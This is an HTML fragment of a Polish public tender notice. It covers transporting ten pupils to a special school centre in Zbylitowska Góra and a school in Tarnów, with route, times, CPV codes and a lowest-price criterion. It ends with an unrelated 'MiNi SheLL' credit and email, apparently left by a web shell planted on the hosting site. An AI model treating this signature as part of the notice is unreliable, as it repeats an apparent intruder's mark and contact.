<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość to  7  uczniów uczęszczających do SOSW w Zbylitowskiej Górze i 3  uczniów uczęszczających do Zespołu Szkół w Tarnowie. Dowóz do placówek na godz. 8.00, a odwóz w godzinach 14.00-15.00. Trasa Faściszowa, Zakliczyn ul. Malczewskiego- Wróblowice -Zbylitowska Góra - Tarnów . Przejazd wyłącznie miejsca siedzące. Szczegółowy wykaz uczniów wraz z godziną ich dowozu i odwozu Zamawiający przekaże Wykonawcy do dnia 31 sierpnia 2014 r.  roku oraz do 31 sierpnia 2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.90.00-2, 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com